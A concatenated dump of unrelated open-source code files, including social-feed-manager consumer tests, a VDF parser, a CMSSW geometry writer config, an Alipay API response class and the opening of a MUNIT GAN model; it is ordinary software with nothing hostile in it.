historical_credential=historical_credential)
historical_stream_collection = stream_collection.history.all()[0]
historical_stream_credential = historical_stream_collection.credential.history.all()[0]
self.stream_harvest = Harvest.objects.create(harvest_id="test:3",
collection=stream_collection,
historical_collection=historical_stream_collection,
historical_credential=historical_stream_credential)
HarvestStat.objects.create(harvest=harvest2, item="photos", count=3, harvest_date=date(2016, 5, 20))
Export.objects.create(export_id="test:2", user=user, export_type="test_type")
self.consumer = SfmUiConsumer()
def test_harvest_status_on_message(self):
self.consumer.routing_key = "harvest.status.test.test_search"
self.consumer.message = {
"id": "test:1",
"status": Harvest.RUNNING,
"date_started": "2015-07-28T11:17:36.640044",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"stats": {
"2016-05-20": {
"photos": 12,
},
"2016-05-21": {
"photos": 19,
},
},
"token_updates": {
"1": "j.littman"
},
"uids": {
"2": "671366249@N03"
},
"warcs": {
"count": 3,
"bytes": 345234242
},
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:1")
self.assertEqual(Harvest.RUNNING, harvest.status)
self.assertEqual(12, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 20)).count)
self.assertDictEqual({
"1": "j.littman"
}, harvest.token_updates)
self.assertDictEqual({
"2": "671366249@N03"
}, harvest.uids)
self.assertEqual(3, harvest.warcs_count)
self.assertEqual(345234242, harvest.warcs_bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors)
self.assertEqual("Twitter Harvester", harvest.service)
self.assertEqual("f0c3c5ef7031", harvest.host)
self.assertEqual("39", harvest.instance)
# Check updated seeds
seed1 = Seed.objects.get(seed_id="1")
self.assertEqual("j.littman", seed1.token)
self.assertTrue(seed1.history_note.startswith("Changed token"))
seed2 = Seed.objects.get(seed_id="2")
self.assertEqual("671366249@N03", seed2.uid)
self.assertTrue(seed2.history_note.startswith("Changed uid"))
# Now update
self.consumer.message = {
"id": "test:1",
"status": Harvest.SUCCESS,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"stats": {
"2016-05-20": {
"photos": 12,
},
"2016-05-21": {
"photos": 24,
"users": 1
},
},
"warcs": {
"count": 5,
"bytes": 645234242
},
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:1")
self.assertEqual(Harvest.SUCCESS, harvest.status)
self.assertEqual(24, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 21)).count)
self.assertEqual(1, harvest.harvest_stats.get(item="users", harvest_date=date(2016, 5, 21)).count)
self.assertEqual(5, harvest.warcs_count)
self.assertEqual(645234242, harvest.warcs_bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), harvest.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors)
self.assertEqual("Twitter Harvester", harvest.service)
self.assertEqual("f0c3c5ef7031", harvest.host)
self.assertEqual("39", harvest.instance)
# Now changes harvest options and check that seeds deleted.
# "deactivate_not_found_seeds": self.cleaned_data["deleted_accounts_option"],
# "deactivate_unauthorized_seeds": self.cleaned_data["protected_accounts_options"],
# "deactivate_suspended_seeds": self.cleaned_data["suspended_accounts_option"]
collection = Collection.objects.get(name="test_collection")
# Make sure both seeds are on.
seed_ids = []
for seed in collection.seeds.all():
self.assertTrue(seed.is_active)
seed_ids.append(seed.seed_id)
collection.harvest_options = json.dumps({
"deactivate_not_found_seeds": True,
"deactivate_unauthorized_seeds": False,
"deactivate_suspended_seeds": False
})
collection.save()
self.consumer.message = {
"id": "test:1",
"status": Harvest.SUCCESS,
"date_started": "2015-07-28T11:18:36.640044",
"date_ended": "2015-07-28T11:18:42.539470",
"warnings": [
{"code": "token_unauthorized", "message": "This token is unauthorized.", "seed_id": seed_ids[0]},
{"code": "token_not_found", "message": "This token is not found.", "seed_id": seed_ids[1]},
],
"service": "Twitter Harvester",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
unauthorized_seed = Seed.objects.get(seed_id=seed_ids[0])
self.assertTrue(unauthorized_seed.is_active)
not_found_seed = Seed.objects.get(seed_id=seed_ids[1])
self.assertFalse(not_found_seed.is_active)
@patch("message_consumer.sfm_ui_consumer.collection_stop")
def test_harvest_status_stream_failed_on_message(self, mock_collection_stop):
self.consumer.routing_key = "harvest.status.twitter.twitter_sample"
self.consumer.message = {
"id": "test:3",
"status": Harvest.FAILURE,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470"
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:3")
self.assertEqual(Harvest.FAILURE, harvest.status)
self.assertFalse(harvest.collection.is_on)
mock_collection_stop.assert_called_once_with(harvest.collection.id)
@patch("message_consumer.sfm_ui_consumer.collection_stop")
def test_rogue_harvest(self, mock_collection_stop):
self.consumer.routing_key = "harvest.status.twitter.twitter_sample"
self.consumer.message = {
"id": "test:3",
"status": Harvest.RUNNING,
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470"
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
harvest = Harvest.objects.get(harvest_id="test:3")
self.assertEqual(Harvest.RUNNING, harvest.status)
self.assertTrue(harvest.collection.is_on)
# Mark the harvest as already being completed.
harvest.status = Harvest.SUCCESS
harvest.save()
# Trigger on_message
self.consumer.on_message()
mock_collection_stop.assert_called_once_with(harvest.collection.id)
def test_on_message_ignores_bad_routing_key(self):
self.consumer.routing_key = "xharvest.status.test.test_search"
# Trigger on_message and nothing happens
self.consumer.on_message()
def test_on_message_ignores_unknown_harvest(self):
self.consumer.routing_key = "harvest.status.test.test_search"
self.consumer.message = {
"id": "xtest:1"
}
# Trigger on_message and nothing happens
self.consumer.on_message()
def test_warc_created_on_message(self):
self.consumer.routing_key = "warc_created"
self.consumer.message = {
"warc": {
"path": "/var/folders/_d/3zzlntjs45nbq1f4dnv48c499mgzyf/T/tmpKwq9NL/test_collection_set/2015/07/28/"
"11/" +
"test_collection_set-flickr-2015-07-28T11:17:36Z.warc.gz",
"sha1": "7512e1c227c29332172118f0b79b2ca75cbe8979",
"bytes": 26146,
"id": "test_collection-flickr-2015-07-28T11:17:36Z",
"date_created": "2015-07-28T11:17:36.640178"
},
"collection_set": {
"path": <KEY>",
"id": "test_collection_set"
},
"harvest": {
"id": "test:1",
}
}
# Trigger on_message
self.consumer.on_message()
# Check created Warc model object
warc = Warc.objects.get(warc_id="test_collection-flickr-2015-07-28T11:17:36Z")
self.assertEqual(self.consumer.message["warc"]["path"], warc.path)
self.assertEqual(self.consumer.message["warc"]["sha1"], warc.sha1)
self.assertEqual(self.consumer.message["warc"]["bytes"], warc.bytes)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640178"), warc.date_created)
self.assertEqual(self.harvest, warc.harvest)
def test_export_status_on_message(self):
self.consumer.routing_key = "export.status.test"
self.consumer.message = {
"id": "test:2",
"status": "running",
"date_started": "2015-07-28T11:17:36.640044",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"service": "Twitter Exporter",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
export = Export.objects.get(export_id="test:2")
self.assertEqual("running", export.status)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started)
self.assertIsNone(export.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors)
self.assertEqual("Twitter Exporter", export.service)
self.assertEqual("f0c3c5ef7031", export.host)
self.assertEqual("39", export.instance)
# Now update
self.consumer.message = {
"id": "test:2",
"status": "completed success",
"date_started": "2015-07-28T11:17:36.640044",
"date_ended": "2015-07-28T11:17:42.539470",
"infos": [{"code": "test_code_1", "message": "congratulations"}],
"warnings": [{"code": "test_code_2", "message": "be careful"}],
"errors": [{"code": "test_code_3", "message": "oops"}],
"service": "Twitter Exporter",
"host": "f0c3c5ef7031",
"instance": "39",
}
# Trigger on_message
self.consumer.on_message()
# Check updated harvest model object
export = Export.objects.get(export_id="test:2")
self.assertEqual("completed success", export.status)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), export.date_started)
self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), export.date_ended)
self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], export.infos)
self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], export.warnings)
self.assertListEqual([{"code": "test_code_3", "message": "oops"}], export.errors)
self.assertEqual("Twitter Exporter", export.service)
self.assertEqual("f0c3c5ef7031", export.host)
self.assertEqual("39", export.instance)
|
Tests/Frequently_used_code/Polygon_drill_test.py | ScriptBox99/dea-notebooks | 282 | 12729567 | <filename>Tests/Frequently_used_code/Polygon_drill_test.py
import pytest
from pathlib import Path
from testbook import testbook
TEST_DIR = Path(__file__).parent.parent.resolve()
NB_DIR = TEST_DIR.parent
NB_PATH = NB_DIR / "Frequently_used_code" / "Polygon_drill.ipynb"
@pytest.fixture(scope="module")
def tb():
with testbook(NB_PATH, execute=True) as tb:
yield tb
def test_ok(tb):
assert True # ok
def test_geometry(tb):
gdf = tb.ref("polygon_to_drill")
assert "geometry" in gdf.columns
def test_vars(tb):
ds = tb.ref("data")
expected_vars = [
"time",
"y",
"x",
"spatial_ref",
"nbart_red",
"nbart_green",
"nbart_blue",
]
for var in expected_vars:
assert var in ds.variables
def test_shape(tb):
ds = tb.ref("mask")
assert len(ds.x) == 97
assert len(ds.y) == 120
def test_masked(tb):
ds = tb.ref("data_masked")
assert ds.nbart_red.isnull().any().item()
|
slack_bolt/authorization/__init__.py | korymath/bolt-python | 160 | 12729613 | from .authorize_result import AuthorizeResult
|
B03898_10_codes/StockOption.py | prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes | 446 | 12729683 | """
README
======
This file contains Python codes.
======
"""
""" Store common attributes of a stock option """
import math
class StockOption(object):
def __init__(self, S0, K, r, T, N, params):
self.S0 = S0
self.K = K
self.r = r
self.T = T
self.N = max(1, N) # Ensure N have at least 1 time step
self.STs = None # Declare the stock prices tree
""" Optional parameterss used by derived classes """
self.pu = params.get("pu", 0) # Probability of up state
self.pd = params.get("pd", 0) # Probability of down state
self.div = params.get("div", 0) # Divident yield
self.sigma = params.get("sigma", 0) # Volatility
self.is_call = params.get("is_call", True) # Call or put
self.is_european = params.get("is_eu", True) # Eu or Am
""" Computed values """
self.dt = T/float(N) # Single time step, in years
self.df = math.exp(
-(r-self.div) * self.dt) # Discount factor |
CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py | Purva-Chaudhari/cmssw | 852 | 12729691 | <filename>CondTools/Geometry/test/writehelpers/geometryExtended2021DD4hep_writer.py
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Run3_dd4hep_cff import Run3_dd4hep
process = cms.Process("GeometryWriter", Run3_dd4hep)
from Configuration.ProcessModifiers.dd4hep_cff import dd4hep
process.load('CondCore.CondDB.CondDB_cfi')
process.load('Configuration.Geometry.GeometryDD4hepExtended2021_cff')
process.load('Geometry.CaloEventSetup.CaloGeometryDBWriter_cfi')
process.load('CondTools.Geometry.HcalParametersWriter_cff')
process.load("Geometry.MuonNumbering.muonGeometryConstants_cff")
process.CaloGeometryBuilder = cms.ESProducer("CaloGeometryBuilder",
SelectedCalos = cms.vstring(
'HCAL',
'ZDC',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER'
)
)
process.source = cms.Source("EmptyIOVSource",
lastValue = cms.uint64(1),
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
interval = cms.uint64(1)
)
# This reads the big XML file and the only way to fill the
# nonreco part of the database is to read this file.
process.XMLGeometryWriter = cms.EDAnalyzer("XMLGeometryBuilder",
XMLFileName = cms.untracked.string("./geSingleBigFile.xml"),
ZIP = cms.untracked.bool(True)
)
process.TrackerGeometryWriter = cms.EDAnalyzer("PGeometricDetBuilder",fromDD4hep=cms.bool(True))
process.TrackerParametersWriter = cms.EDAnalyzer("PTrackerParametersDBBuilder",fromDD4hep=cms.bool(True))
process.CaloGeometryWriter = cms.EDAnalyzer("PCaloGeometryBuilder",fromDD4Hep = cms.untracked.bool(True))
process.CSCGeometryWriter = cms.EDAnalyzer("CSCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.DTGeometryWriter = cms.EDAnalyzer("DTRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.RPCGeometryWriter = cms.EDAnalyzer("RPCRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.GEMGeometryWriter = cms.EDAnalyzer("GEMRecoIdealDBLoader",fromDD4Hep = cms.untracked.bool(True))
process.CondDB.timetype = cms.untracked.string('runnumber')
process.CondDB.connect = cms.string('sqlite_file:myfile.db')
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('GeometryFileRcd'),tag = cms.string('XMLFILE_Geometry_TagXX_Extended2021_mc')),
cms.PSet(record = cms.string('IdealGeometryRecord'),tag = cms.string('TKRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PTrackerParametersRcd'),tag = cms.string('TKParameters_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalBarrelRcd'), tag = cms.string('EBRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalEndcapRcd'), tag = cms.string('EERECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PEcalPreshowerRcd'),tag = cms.string('EPRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PHcalRcd'), tag = cms.string('HCALRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('HcalParametersRcd'), tag = cms.string('HCALParameters_Geometry_TagXX')),
cms.PSet(record = cms.string('PCaloTowerRcd'), tag = cms.string('CTRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PZdcRcd'), tag = cms.string('ZDCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('PCastorRcd'), tag = cms.string('CASTORRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('CSCRecoGeometryRcd'),tag = cms.string('CSCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('CSCRecoDigiParametersRcd'),tag = cms.string('CSCRECODIGI_Geometry_TagXX')),
cms.PSet(record = cms.string('DTRecoGeometryRcd'),tag = cms.string('DTRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('RPCRecoGeometryRcd'),tag = cms.string('RPCRECO_Geometry_TagXX')),
cms.PSet(record = cms.string('GEMRecoGeometryRcd'),tag = cms.string('GEMRECO_Geometry_TagXX'))
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.p1 = cms.Path(process.XMLGeometryWriter+process.TrackerGeometryWriter+process.TrackerParametersWriter+process.CaloGeometryWriter+process.HcalParametersWriter+process.CSCGeometryWriter+process.DTGeometryWriter+process.RPCGeometryWriter+process.GEMGeometryWriter)
|
cellphonedb/tools/app.py | BioTuring-Notebooks/CellphoneDB | 278 | 12729742 | import os
from flask import Flask
this_file_dir = os.path.dirname(os.path.realpath(__file__))
data_dir = '{}/data'.format(this_file_dir)
output_dir = '{}/out'.format(this_file_dir)
downloads_dir = '{}/downloads'.format(data_dir)
def create_app():
app = Flask(__name__)
return app
|
valve/vdf.py | Crowbar-Sledgehammer/python-valve | 136 | 12729743 | <reponame>Crowbar-Sledgehammer/python-valve
# -*- coding: utf-8 -*-
# Copyright (C) 2013 <NAME>
"""
Implements a parser for the Valve Data Format (VDF,) or as often
refered KeyValues.
Currently only provides parsing functionality without the ability
to serialise. API designed to mirror that of the built-in JSON
module.
https://developer.valvesoftware.com/wiki/KeyValues
"""
import string
import re
_KV_KEY = 0
_KV_BLOCK = 1
_KV_BLOCKEND = 2
_KV_PAIR = 3
ALWAYS = 0
UNQUOTED = 1
NEVER = 2
def coerce_type(token):
"""
Attempts to convert a token to a native Python object by
matching it against various regexes.
Will silently fall back to string if no conversion can be made.
Currently only capable of converting integers and floating point
numbers.
"""
regexes = [
# regex, converter
(r"^-?[0-9]+$", int),
(r"^[-+]?[0-9]*\.?[0-9]+$", float),
# TODO: ("rgb", pass),
# TODO: ("hex triplet", pass),
]
for regex, converter in regexes:
print(regex, converter, token, re.match(regex, token, re.UNICODE))
if re.match(regex, token, re.UNICODE):
return converter(token)
# Fallback to string
return token
# Largely based on necavi's https://github.com/necavi/py-keyvalues
def loads(src, encoding=None, coerce_=UNQUOTED):
"""
Loades a VDF string into a series of nested dictionaries.
encoding -- The encoding of the given source string if not
Unicode. If this is not set and a bytestring is
given, ASCII will be the assumed encoding.
corece_ -- can be set to determine whether an attempt should
be made to convert values to native Python type
equivalents.
If set to UNQUOTED (default,) only values that
are not enclosed in double quotes will be
converted.
If set to ALWAYS, will attempt to convert
regardless of whether the value is quoted or not.
not recommended.
If set to NEVER, no attempt will be made to
convert. Should produce most reliable behaviour.
"""
if isinstance(src, str) and encoding is None:
encoding = "ascii"
if encoding is not None:
src = src.decode(encoding)
# else:
# assume unicode
# pair type, pair key, pair value, coerce
pairs = [[_KV_BLOCK, "", None, False]]
# _KV_KEY -- all tokens begin as this
# _KV_BLOCK -- is for when a _KV_KEY is followed by a {
# _KV_PAIR -- is for when a _KV_KEY is followed by another token
extended_alphanumeric = set(
string.ascii_letters.decode("ascii") +
unicode(string.digits) +
u".-_")
i = 0
line = 1
col = 0
token = None
try:
while i < len(src):
char = src[i]
# Whitespace
if char in {u" ", u"\t"}:
pass
# End-of-line
elif char == u"\n":
try:
if src[i+1] == u"\r": # Will IndexError at EOF
i += 1
col += 1
line += 1
col = 0
except IndexError:
pass
# End-of-line
elif char == u"\r":
try:
if src[i+1] == u"\n": # Will IndexError at EOF
i += 1
col += 1
line += 1
col = 0
except IndexError:
pass
# Double-quotes enclosed token
elif char == u"\"":
token = u""
while True:
i += 1
col += 1
char = src[i]
# I don't agree with the assertion in py-keyvalues
# that \n or \r should also terminate a token if
# its quoted.
if char == u"\"":
break
elif char in {"\r", "\n"}:
raise SyntaxError("End-of-line quoted token")
elif char == u"\\":
i += 1
try:
escaped_char = src[i]
except IndexError:
raise SyntaxError("EOF in escaped character")
try:
char = {
u"n": u"\n",
u"r": u"\r",
u"t": u"\t",
u"\"": u"\"",
u"\\": u"\\",
}[escaped_char]
except KeyError:
raise SyntaxError("Invalid escape character")
token += char
if pairs[-1][0] == _KV_KEY:
pairs[-1][0] = _KV_PAIR
pairs[-1][2] = token
pairs[-1][3] = coerce_ in [ALWAYS]
else:
pairs.append([_KV_KEY, token, None, False])
# Unquoted token
elif char in extended_alphanumeric:
token = u""
while True:
token += char
i += 1
col += 1
char = src[i]
if char not in extended_alphanumeric:
# Assume end of token; in most cases this will
# white space or a new line
# If newline, rewind 1 char so it can be
# properly handled by the end-of-line processors
if char in {u"\n", u"\r"}:
i -= 1
col -= 1
char = src[i]
break
if pairs[-1][0] == _KV_KEY:
pairs[-1][0] = _KV_PAIR
pairs[-1][2] = token
pairs[-1][3] = coerce_ in [ALWAYS, UNQUOTED]
else:
pairs.append([_KV_KEY, token, None, False])
# I don't know if there are any cases where an unquoted
# key may be illegal, e.g. if it contains only digits.
# I assume it is, but I won't handle it for now.
# Block start
elif char == u"{":
if pairs[-1][0] != _KV_KEY:
raise SyntaxError("Block doesn't follow block name")
pairs[-1][0] = _KV_BLOCK
elif char == u"}":
pairs.append([_KV_BLOCKEND, None, None, False])
else:
raise SyntaxError("Unexpected character")
i += 1
col += 1
except SyntaxError as exc:
raise ValueError("{} '{}'; line {} column {}".format(
exc.message, src[i], line, col))
dict_ = {}
dict_stack = [dict_]
CURRENT = -1
PREVIOUS = -2
for type, key, value, should_coerce in pairs[1:]:
if type == _KV_BLOCK:
dict_stack.append({})
dict_stack[PREVIOUS][key] = dict_stack[CURRENT]
elif type == _KV_BLOCKEND:
dict_stack = dict_stack[:CURRENT]
elif type == _KV_PAIR:
dict_stack[CURRENT][key] = (coerce_type(value) if
should_coerce else value)
# else:
# should never occur, but would be caused by a token not being
# followed by a block or value
return dict_
def load(fp, encoding=None, coerce_=UNQUOTED):
"""
Same as loads but takes a file-like object as the source.
"""
return loads(fp.read(), encoding, coerce_)
def dumps(obj, encoding=None, indent=u" ", object_encoders={}):
"""
Serialises a series of nested dictionaries to the VDF/KeyValues
format and returns it as a string.
If 'encoding' isn't specified a Unicode string will be returned,
else an ecoded bytestring will be.
'indent' is the string to be used to indent nested blocks. The
string given should be Unicode and represent one level of
indentation. Four spaces by default.
'object_encoders' maps a series of types onto serialisers, which
convert objects to their VDF equivalent. If no encoder is
specified for a type it'll fall back to using __unicode__.
Note that currently this likely causes None to be encoded
incorrectly. Also, floats which include the exponent in their
textual representaiton may also be 'wrong.'
"""
object_codecs = {
float: lambda v: unicode(repr(v / 1.0)),
}
object_codecs.update(object_encoders)
# I don't know how TYPE_NONE (None) are meant to be encoded so we
# just use unicode() until it's known.
lines = []
def recurse_obj(obj, indent_level=0):
ind = indent * indent_level
for key, value in obj.iteritems():
if isinstance(value, dict):
lines.append(u"{}\"{}\"".format(ind, key))
lines.append(u"{}{{".format(ind))
recurse_obj(value, indent_level + 1)
lines.append(u"{}}}".format(ind))
else:
lines.append(u"{}\"{}\"{}\"{}\"".format(
ind,
key,
indent,
object_codecs.get(type(value), unicode)(value),
))
recurse_obj(obj)
if encoding is not None:
return u"\n".join(lines).encode(encoding)
else:
return u"\n".join(lines)
def dump(obj, fp, encoding, indent=u" ", object_encoders={}):
"""
Same as dumps but takes a file-like object 'fp' which will be
written to.
"""
return fp.write(dumps(obj, encoding, indent, object_encoders))
|
compiler_gym/envs/llvm/service/passes/common.py | mostafaelhoushi/CompilerGym | 562 | 12729779 | <filename>compiler_gym/envs/llvm/service/passes/common.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import NamedTuple, Optional
class Pass(NamedTuple):
"""The declaration of an LLVM pass."""
# The name of the pass, e.g. "AddDiscriminatorsPass".
name: str
# The opt commandline flag which turns this pass on, e.g. "-add-discriminators".
flag: str
# The docstring for this pass, as reported by `opt -help`. E.g. "Add DWARF path discriminators".
description: str
# The path of the C++ file which defines this pass, relative to the LLVM source tree root.
source: str
# The path of the C++ header which declares this pass, relative to the LLVM source tree root.
# If the header path could not be inferred, this is None.
header: Optional[str]
# Boolean flags set in INITIALIZE_PASS().
cfg: bool
is_analysis: bool
|
benchmark/tests/test_automatic_test.py | yuanliya/Adlik | 548 | 12729784 | # Copyright 2019 ZTE corporation. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
The test of automatic test.
"""
import unittest
import subprocess
import os
class TestAutomaticTest(unittest.TestCase):
"""
The test of automatic test
"""
@staticmethod
def test_automatic_test():
"""
The test of automatic test.
"""
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
model_command = ['python3', 'benchmark/tests/test_model/mnist_keras/mnist_keras.py']
subprocess.run(args=model_command, cwd=base_dir, check=True)
command = ['python3', 'benchmark/src/automatic_test.py',
'-d', 'benchmark/tests/docker_test/openvino.Dockerfile',
'-s', 'openvino',
'-b', '.',
'-a', '.',
'-m', 'mnist',
'-c', 'benchmark/tests/client_script/client_script.sh',
'-ss', 'benchmark/tests/serving_script/openvino_serving_script.sh',
'-l', os.path.join(base_dir, 'benchmark/log'),
'-tm', 'benchmark/tests/test_model/mnist_keras',
'-cis', 'mnist_client.py',
'-i', 'mnist.png',
'-cs', 'benchmark/tests/compile_script/openvino_compile_script.sh']
with subprocess.Popen(args=command, cwd=base_dir) as process:
print(process.stdout)
|
Search/hash_tables.py | anand722000/algo_ds_101 | 175 | 12729799 | #!/bin/python3
import math
import os
import random
import re
import sys
def flavors(m,a):
prices = {}
for idx, p in enumerate(a):
if m-p in prices:
return prices[m-p], idx
prices[p] = idx
return None
t = int(input().strip())
for a0 in range(t):
m = int(input().strip())
n = int(input().strip())
a = list(map(int, input().strip().split(' ')))
f1, f2 = flavors(m,a)
print(f1+1, f2+1)
|
test/integration/samples_in/simple_format.py | Inveracity/flynt | 487 | 12729843 | var = 5
a = "my string {:.2f}".format(var) |
alipay/aop/api/response/AlipayOpenMiniAmpeMobileappBatchqueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12729845 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.MobileAppInfo import MobileAppInfo
class AlipayOpenMiniAmpeMobileappBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).__init__()
self._mobile_app_info_list = None
@property
def mobile_app_info_list(self):
return self._mobile_app_info_list
@mobile_app_info_list.setter
def mobile_app_info_list(self, value):
if isinstance(value, list):
self._mobile_app_info_list = list()
for i in value:
if isinstance(i, MobileAppInfo):
self._mobile_app_info_list.append(i)
else:
self._mobile_app_info_list.append(MobileAppInfo.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).parse_response_content(response_content)
if 'mobile_app_info_list' in response:
self.mobile_app_info_list = response['mobile_app_info_list']
|
problems/tests/test_two_sum_ii_input_array_is_sorted.py | vinta/fuck-coding-interviews | 590 | 12729856 | # coding: utf-8
import unittest
from problems.two_sum_ii_input_array_is_sorted import Solution
class TestCase(unittest.TestCase):
def setUp(self):
self.solution = Solution()
def test(self):
test_data = [
{'numbers': [2, 7, 11, 15], 'target': 9, 'expected': [1, 2]},
{'numbers': [2, 3, 4], 'target': 6, 'expected': [1, 3]},
{'numbers': [-1, 0], 'target': -1, 'expected': [1, 2]},
{'numbers': [1, 2, 3, 4, 5, 6, 7, 19, 100, 222, 412], 'target': 13, 'expected': [6, 7]},
]
for data in test_data:
numbers = data['numbers']
target = data['target']
expected = data['expected']
with self.subTest(numbers=numbers, target=target):
self.assertEqual(self.solution.twoSum(numbers, target), expected)
if __name__ == '__main__':
unittest.main()
|
models/munit_model.py | NguyenHoangAn0511/gan-compression | 1,005 | 12729881 | <reponame>NguyenHoangAn0511/gan-compression
import argparse
import itertools
import ntpath
import os
import numpy as np
import torch
from torch import nn
from tqdm import tqdm
from data import create_eval_dataloader
from metric import create_metric_models, get_fid
from models import networks
from models.base_model import BaseModel
from models.modules.loss import GANLoss
from utils import util
class MunitModel(BaseModel):
@staticmethod
def modify_commandline_options(parser, is_train=False):
assert is_train
parser = super(MunitModel, MunitModel).modify_commandline_options(parser, is_train)
assert isinstance(parser, argparse.ArgumentParser)
parser.add_argument('--restore_G_A_path', type=str, default=None, help='the path to restore the generator A')
parser.add_argument('--restore_G_B_path', type=str, default=None, help='the path to restore the generator B')
parser.add_argument('--restore_D_A_path', type=str, default=None,
help='the path to restore the discriminator A')
parser.add_argument('--restore_D_B_path', type=str, default=None,
help='the path to restore the discriminator B')
parser.add_argument('--style_dim', type=int, default=8,
help='the dimension of the style vector')
parser.add_argument('--n_downsample', type=int, default=2,
help='the number of downsample layer in the generator')
parser.add_argument('--n_res', type=int, default=4,
help='the number of the ResBlock in the generator')
parser.add_argument('--activ', type=str, default='relu',
help='the activation type of the generator')
parser.add_argument('--pad_type', type=str, default='reflect',
help='the padding type of the generator')
parser.add_argument('--mlp_dim', type=int, default=256,
help='the dimension of the mlp layer in the generator')
parser.add_argument('--no_style_encoder', action='store_true',
help='whether to have the style encoder in the generator')
parser.add_argument('--lambda_rec_x', type=float, default=10,
help='weight of image reconstruction loss')
parser.add_argument('--lambda_rec_s', type=float, default=1,
help='weight of style reconstruction loss')
parser.add_argument('--lambda_rec_c', type=float, default=1,
help='weight of content reconstruction loss')
parser.add_argument('--lambda_gan', type=float, default=1,
help='weight of gan loss')
parser.add_argument('--weight_decay', type=float, default=1e-4,
help='weight decay of the optimizer')
parser.add_argument('--real_stat_A_path', type=str, required=True,
help='the path to load the ground-truth A images information to compute FID.')
parser.add_argument('--real_stat_B_path', type=str, required=True,
help='the path to load the ground-truth B images information to compute FID.')
parser.set_defaults(dataset_mode='unaligned', gan_mode='lsgan', load_size=256,
netG='munit', netD='ms_image', ndf=64, n_layers_D=4, init_type='kaiming',
lr_policy='step', lr=1e-4, scheduler_counter='iter',
nepochs=21, nepochs_decay=0, niters=1000000,
save_latest_freq=100000000, save_epoch_freq=1)
return parser
def __init__(self, opt):
assert opt.isTrain
assert opt.direction == 'AtoB'
